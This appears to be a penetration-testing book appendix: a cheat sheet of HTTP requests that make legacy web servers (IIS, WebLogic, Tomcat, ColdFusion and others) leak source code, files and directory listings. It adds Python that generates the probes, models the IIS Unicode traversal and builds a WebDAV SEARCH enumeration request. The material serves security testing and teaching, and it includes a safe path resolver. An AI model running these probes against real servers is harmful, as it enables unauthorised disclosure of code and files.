This appendix lists the major source code, file, and directory disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear in later versions, whatever the vendors say. Nearly all of them work the same way: the server is talked into treating a script as a static file (a mangled or oddly-cased extension, an encoded character, a trailing dot or backslash, an NTFS alternate data stream), or a sample, help, or administrative page that reads files on the server's behalf is pointed at a file it was never meant to show. When you test, request the normal page first and compare; a leak is a response that contains server-side code the rendered page does not.
Source Code, File, and Directory Disclosure Cheat Sheet

Source Code Disclosure

Vulnerable Application | HTTP Request | Vulnerability Information
Allaire ColdFusion | GET /CFDOCS/snippets/viewexample.cfm?Tagname=<relative path to CFM file> HTTP/1.0 |
Allaire JRun Alternative Data Stream | GET /file.jsp::$DATA HTTP/1.0 |
Allaire JRun Server Side Include | GET /file HTTP/1.0 with header Content-Length: <length of filename + 28> and body <!--#include virtual="<filename>"--> |
Apache Tomcat %70 | 1. GET /file.js%70 HTTP/1.0 2. GET /file%252ejsp HTTP/1.0 |
BEA WebLogic Case Sensitive File Extension | 1. GET /file.JSP HTTP/1.0 2. GET /file.jsP HTTP/1.0 3. GET /file.Jsp HTTP/1.0 |
BEA WebLogic 5.1 %70 | GET /file.js%70 HTTP/1.0 |
BEA WebLogic FileServlet | GET /ConsoleHelp/file.jsp HTTP/1.0 |
BEA WebLogic /file/ | GET /file/file.jsp HTTP/1.0 |
BEA WebLogic /*.shtml/ | GET /*.shtml/file.jsp HTTP/1.0 |
IBM WebSphere Case Sensitive File Extension | 1. GET /file.JSP HTTP/1.0 2. GET /file.jsP HTTP/1.0 3. GET /file.Jsp HTTP/1.0 |
IBM WebSphere /servlet/file/ | GET /servlet/file/file.jsp HTTP/1.0 |
Microsoft IIS 4.0 + FAT Filesystem | GET /file.%E2%73%70 HTTP/1.0 |
Microsoft IIS 4.0 Alternative Data Stream | GET /file::$DATA HTTP/1.0 | MS98-003
Microsoft IIS +.htr | GET /file.asp+.htr HTTP/1.0 |
Microsoft IIS Translate: f | GET /file.asp HTTP/1.0 with header Translate: f | MS00-058; the original report appended a backslash to the file name (GET /file.asp\ HTTP/1.0)
Microsoft IIS 3.0 %2e | GET /file%2easp HTTP/1.0 |
Microsoft IIS 2.0/3.0 Append "." | 1. GET /file.asp. HTTP/1.0 2. GET /file.pl. HTTP/1.0 3. GET /file.asp%2e HTTP/1.0 4. GET /file.pl%2e HTTP/1.0 |
Oracle /_pages/ | GET /_pages/ HTTP/1.0 |
Sun Java Web Server .jhtml | 1. GET /file.jhtml. HTTP/1.0 2. GET /file.jhtml\ HTTP/1.0 |
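Most rows in the table above are the same handful of tricks applied to a known dynamic page: change the case of the extension, percent-encode one character of it, append a dot, a backslash or ::$DATA, add +.htr, send Translate: f, or prefix the path with /file/ or /*.shtml/. What you need on an engagement is the variant list plus a reliable way to tell a real leak from a rendered page. The following is an added example written for this edition, not code from the book or from any of the vendors named: it generates the probe paths for one page and flags a response as a leak only when it contains server-side markers that the normally rendered page does not (so a page that legitimately prints "<%" in its output does not trip it). The target path /app/login.jsp, the host www.example.com and the fake_fetch stand-in for a server are constructed; replace fake_fetch with a real HTTP client to use it.

```python
import re

# Markers of unrendered server-side code, keyed by the extension being probed.
SOURCE_MARKERS = {
    "jsp": re.compile(r"<%[@!=]?|<jsp:", re.I),
    "asp": re.compile(r"<%[@=]?|<script[^>]+runat\s*=\s*\"?server", re.I),
    "cfm": re.compile(r"<cf(output|query|set|if|include)\b", re.I),
    "php": re.compile(r"<\?(php|=)"),
}


def mangle(path):
    """Probe variants for one dynamic page as (label, path, extra_headers).
    The labels follow the table rows; these are the generic tricks that hit
    several products, so try all of them regardless of the server banner."""
    base, dot, e = path.rpartition(".")
    if not dot or "/" in e:            # no extension to mangle
        return []
    return [
        ("ext-upper",          f"{base}.{e.upper()}",                 {}),
        ("ext-last-upper",     f"{base}.{e[:-1]}{e[-1].upper()}",      {}),
        ("ext-first-upper",    f"{base}.{e[0].upper()}{e[1:]}",        {}),
        ("pct-last-char",      f"{base}.{e[:-1]}%{ord(e[-1]):02x}",    {}),   # .js%70
        ("pct-dot",            f"{base}%2e{e}",                        {}),
        ("double-pct-dot",     f"{base}%252e{e}",                      {}),
        ("trailing-dot",       f"{path}.",                             {}),
        ("trailing-pct-dot",   f"{path}%2e",                           {}),
        ("trailing-bslash",    f"{path}\\",                            {}),
        ("trailing-space",     f"{path}%20",                           {}),
        ("ads",                f"{path}::$DATA",                       {}),
        ("plus-htr",           f"{path}+.htr",                         {}),
        ("shtml-prefix",       f"/*.shtml{path}",                      {}),
        ("file-prefix",        f"/file{path}",                         {}),
        ("translate-f",        path,                                   {"Translate": "f"}),
        ("translate-f-bslash", f"{path}\\",                            {"Translate": "f"}),
    ]


def raw_request(host, path, headers=None):
    """The request exactly as the table writes it, as bytes for a raw socket."""
    lines = [f"GET {path} HTTP/1.0", f"Host: {host}"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def classify(ext, baseline_body, status, body):
    """'leak' when a probe returns 200 with code markers that the rendered
    baseline lacks; 'no' otherwise."""
    marker = SOURCE_MARKERS.get(ext.lower())
    if status != 200 or marker is None:
        return "no"
    if marker.search(body) and not marker.search(baseline_body):
        return "leak"
    return "no"


def leaking_variants(path, fetch):
    """fetch(path, headers) -> (status, body). Returns the labels that leaked."""
    ext = path.rpartition(".")[2]
    _, baseline = fetch(path, {})          # the normally rendered page
    return [label for label, p, h in mangle(path)
            if classify(ext, baseline, *fetch(p, h)) == "leak"]


# Constructed stand-in for a server: only the %70 trick leaks here.
RENDERED = "<html><body><form action='login.jsp'><input name='u'></form></body></html>"
SOURCE = ('<%@ page import="java.sql.*" %>\n'
          '<% String dbPass = "example-not-real"; %>\n' + RENDERED)


def fake_fetch(path, headers):
    if path == "/app/login.js%70":
        return 200, SOURCE
    if path == "/app/login.jsp":
        return 200, RENDERED
    return 404, "Not Found"


if __name__ == "__main__":
    for label, p, h in mangle("/app/login.jsp"):
        print(label, raw_request("www.example.com", p, h).decode().splitlines()[0])
    print("leaked via:", leaking_variants("/app/login.jsp", fake_fetch))
```

Keep the baseline comparison: several of the table's tricks (the trailing dot, ::$DATA, Translate: f) return the rendered page on patched servers, and a 200 alone tells you nothing.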
|
File Disclosure

Vulnerable Application | HTTP Request | Vulnerability Information
Allaire ColdFusion Server exprcalc.cfm | GET /cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\file HTTP/1.0 |
Allaire ColdFusion openfile.cfm | GET /cfdocs/expeval/openfile.cfm ?????????? HTTP/1.0 |
Allaire ColdFusion sourcewindow.cfm | GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=../../file HTTP/1.0 |
Allaire JRun /servlet/ | 1. GET /servlet/ssiservlet/../../file HTTP/1.0 2. GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../file HTTP/1.0 |
Apache Web Server + PHP.EXE for Win32 | GET /php/php.exe?c:\file HTTP/1.0 |
Apache Web Server + PHP3 | GET /file.php3.%5c../..%5c<relative path to file> HTTP/1.0 |
Microsoft IIS Unicode | 1. GET /scripts/..%c1%1c../<relative path to file> HTTP/1.0 2. GET /scripts/..%c0%9v../<relative path to file> HTTP/1.0 3. GET /scripts/..%c0%af../<relative path to file> HTTP/1.0 | MS00-078; %c0%af and %c1%1c are overlong or malformed UTF-8 that IIS decoded to "/" and "\" after its traversal check
Microsoft IIS Double Decode | GET /scripts/..%255c..%255c<relative path to file> HTTP/1.0 | MS01-026; %255c passes the check as "%5c" and is decoded a second time to "\"
Microsoft IIS %20.htr | GET /file%20("%20" repeated 230 times).htr HTTP/1.0 |
Microsoft IIS idq.dll | GET /query.idq?CiTemplate=<relative path to file> HTTP/1.0 |
Microsoft IIS showcode.asp | GET /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/<relative path to file> HTTP/1.0 | MS99-013
Microsoft IIS codebrws.asp | GET /iissamples/exair/howitworks/codebrws.asp?source=<relative path to file> HTTP/1.0 | MS99-013
Microsoft IIS viewcode.asp | 1. GET /Sites/Knowledge/Membership/Inspired/ViewCode.asp?source=<relative path to file> HTTP/1.0 2. GET /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?source=<relative path to file> HTTP/1.0 3. GET /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?source=<relative path to file> HTTP/1.0 | http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q231656&;
Netscape Enterprise Server %20 | GET /file%20 HTTP/1.0 |
Netscape Enterprise Server /publisher | GET /publisher HTTP/1.0 |
Netscape Enterprise Server Win32 8.3 filename | Normal request: GET /directory/ HTTP/1.0 Exploitative request: GET /direct~1/ HTTP/1.0 |
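The IIS Unicode and Double Decode rows above are the clearest illustration of the ordering bug behind most traversal-based file disclosure: the server checked the path for ".." before it had finished decoding it. The following is an added example written for this edition, not code from the book or from Microsoft: it models a decoder that accepts overlong and malformed two-byte UTF-8 (so C0 AF becomes "/" and C1 1C becomes "\") and a second %XX pass, and puts a check-then-decode resolver next to a decode-fully-then-check one. The model is deliberately simple and is not IIS's code; the web root /inetpub/wwwroot and the target file names are constructed, and the function names are mine.

```python
import posixpath
import re

HEX = b"0123456789abcdefABCDEF"
WEB_ROOT = "/inetpub/wwwroot"          # constructed layout for the demo


def pct_decode_once(s: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes are left untouched."""
    out, i = bytearray(), 0
    while i < len(s):
        pair = s[i + 1:i + 3]
        if s[i] == 0x25 and len(pair) == 2 and all(c in HEX for c in pair):
            out.append(int(pair, 16))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return bytes(out)


def lenient_utf8(b: bytes) -> str:
    """Model of a decoder that accepts overlong or malformed two-byte sequences
    by keeping the low bits of each byte, which is the behaviour the table's
    Unicode requests rely on: C0 AF -> '/', C1 1C -> '\\'."""
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if 0xC0 <= c <= 0xDF and i + 1 < len(b):
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))
            i += 1
    return "".join(out)


def vulnerable_resolve(web_root: str, request_path: str):
    """Check, then decode. The '..' check runs on the single-decoded bytes, so
    '..' hidden behind %c0%af, %c1%1c or %255c is not a '..' segment yet; the
    second %XX pass and the lenient UTF-8 step then produce real separators."""
    once = pct_decode_once(request_path.encode("latin-1"))
    if b".." in re.split(rb"[/\\]", once):
        return None                                   # literal ../ is caught
    canon = lenient_utf8(pct_decode_once(once)).replace("\\", "/")
    return posixpath.normpath(web_root + "/" + canon.lstrip("/"))


def safe_resolve(web_root: str, request_path: str):
    """Decode fully and strictly, canonicalise, then check the result stays
    under the root. Returns None for anything rejected."""
    raw = request_path.encode("latin-1")
    for _ in range(4):                       # bounded: stop once no %XX remains
        decoded = pct_decode_once(raw)
        if decoded == raw:
            break
        raw = decoded
    try:
        text = raw.decode("utf-8")           # strict: overlong/malformed bytes rejected
    except UnicodeDecodeError:
        return None
    if "\x00" in text:
        return None
    full = posixpath.normpath(web_root + "/" + text.replace("\\", "/").lstrip("/"))
    if full != web_root and not full.startswith(web_root.rstrip("/") + "/"):
        return None
    return full


if __name__ == "__main__":
    for p in ("/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe",
              "/scripts/..%c1%1c../winnt/system32/cmd.exe",
              "/scripts/..%255c..%255cwinnt/system32/cmd.exe",
              "/scripts/../../winnt/system32/cmd.exe",
              "/scripts/hello.asp"):
        print(p, "->", vulnerable_resolve(WEB_ROOT, p), "|", safe_resolve(WEB_ROOT, p))
```

The same ordering mistake explains the Apache + PHP3 row (%5c decoded after the check) and the Oracle mod_plsql row in the next table (%255c again): whatever the product, decode completely, reject anything that is not valid encoding, canonicalise, and only then compare against the document root.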
|
Directory Disclosure

Vulnerable Application | HTTP Request | Vulnerability Information
Allaire JRun //WEB-INF/ | GET //WEB-INF/ HTTP/1.0 |
Allaire JRun %3f | GET /%3f.jsp HTTP/1.0 |
Apache Web Server + Mac OS X .DS_Store | 1. GET /.DS_Store HTTP/1.0 2. GET /.FBCIndex HTTP/1.0 | Finder metadata files left in a published directory list its contents
Apache Web Server Multiview | 1. GET /?M=A HTTP/1.0 2. GET /?S=D HTTP/1.0 | ?M= and ?S= are mod_autoindex column-sort parameters
Apache Web Server Long Slash | GET <1 to 4096 '/' characters> HTTP/1.0 |
Apache Web Server /cgi-bin/test-cgi | 1. GET /cgi-bin/test-cgi?/* HTTP/1.0 2. GET /cgi-bin/test-cgi?* HTTP/1.0 | the sample script echoes $QUERY_STRING unquoted, so the shell expands the glob
BEA WebLogic /%00/ | 1. GET /%00/ HTTP/1.0 2. GET /%2e/ HTTP/1.0 3. GET /%2f/ HTTP/1.0 4. GET /%5c/ HTTP/1.0 |
Microsoft IIS 5.0 WebDAV | SEARCH / HTTP/1.1 with headers Host: <hostname or ip address>, Content-Type: text/xml, Content-Length: 133, and body <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> | the Content-Length of 133 is correct only when the six body lines are separated by CRLF; recompute it if you change the body
Microsoft IIS 3.0/4.0 BDIR.HTR | GET /scripts/iisadmin/bdir.htr??c:\ HTTP/1.0 |
Netscape Enterprise Server INDEX | INDEX / HTTP/1.0 |
Netscape Enterprise Server /?wp-cs-dump | 1. GET /?wp-cs-dump HTTP/1.0 2. GET /?wp-ver-info HTTP/1.0 3. GET /?wp-html-rend HTTP/1.0 |
Oracle Internet Application Server /WebDB/admin_/ | GET /WebDB/admin_/ HTTP/1.0 |
Oracle 9i Application Server mod_plsql | GET /pls/sample/admin_/help/..%255c<relative path to file> HTTP/1.0 |
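The IIS 5.0 WebDAV SEARCH row is the one request in the table with a body, and the usual way to get it wrong is a Content-Length that does not match the bytes actually sent, after which the server simply hangs waiting for the rest. The following is an added example written for this edition, not code from the book or from Microsoft: it builds the SEARCH request with the Content-Length computed from the encoded body (which is how the 133 in the table comes out), and pulls the DAV:href and DAV:displayname values out of a 207 Multi-Status reply. The host www.example.com and the sample reply are constructed; the reply follows the shape of a DAV: multistatus document, with made-up names.

```python
import xml.etree.ElementTree as ET

# Body of the SEARCH request from the table, joined with CRLF as it is sent.
SEARCH_BODY = "\r\n".join([
    '<?xml version="1.0"?>',
    '<g:searchrequest xmlns:g="DAV:">',
    '<g:sql>',
    'Select "DAV:displayname" from scope()',
    '</g:sql>',
    '</g:searchrequest>',
])


def build_search_request(host, path="/", body=SEARCH_BODY):
    """Raw SEARCH request. Content-Length is taken from the encoded body rather
    than hard-coded, so editing the body cannot leave the length stale."""
    payload = body.encode("utf-8")
    head = (
        f"SEARCH {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + payload


def parse_multistatus(xml_text):
    """(href, displayname) pairs from a DAV: multistatus document; [] if the
    document is not one (an error page, a plain 200, etc.)."""
    ns = {"D": "DAV:"}
    root = ET.fromstring(xml_text)
    if root.tag != "{DAV:}multistatus":
        return []
    return [
        (r.findtext("D:href", default="", namespaces=ns),
         r.findtext("D:propstat/D:prop/D:displayname", default="", namespaces=ns))
        for r in root.findall("D:response", ns)
    ]


# Constructed 207 reply in the shape a DAV server returns; host and names are made up.
SAMPLE_REPLY = """<?xml version="1.0"?>
<a:multistatus xmlns:a="DAV:">
<a:response><a:href>http://www.example.com/</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>wwwroot</a:displayname></a:prop></a:propstat></a:response>
<a:response><a:href>http://www.example.com/_private/</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>_private</a:displayname></a:prop></a:propstat></a:response>
<a:response><a:href>http://www.example.com/global.asa</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>global.asa</a:displayname></a:prop></a:propstat></a:response>
</a:multistatus>"""


def listed_names(reply=SAMPLE_REPLY):
    """Just the names, which is what you scan for unlinked files such as global.asa."""
    return [name for _, name in parse_multistatus(reply)]


if __name__ == "__main__":
    print(build_search_request("www.example.com").decode())
    print(listed_names())
```

The payoff of the SEARCH method is that it enumerates files that are never linked from any page; combine the names it returns with the source disclosure tricks from the first table.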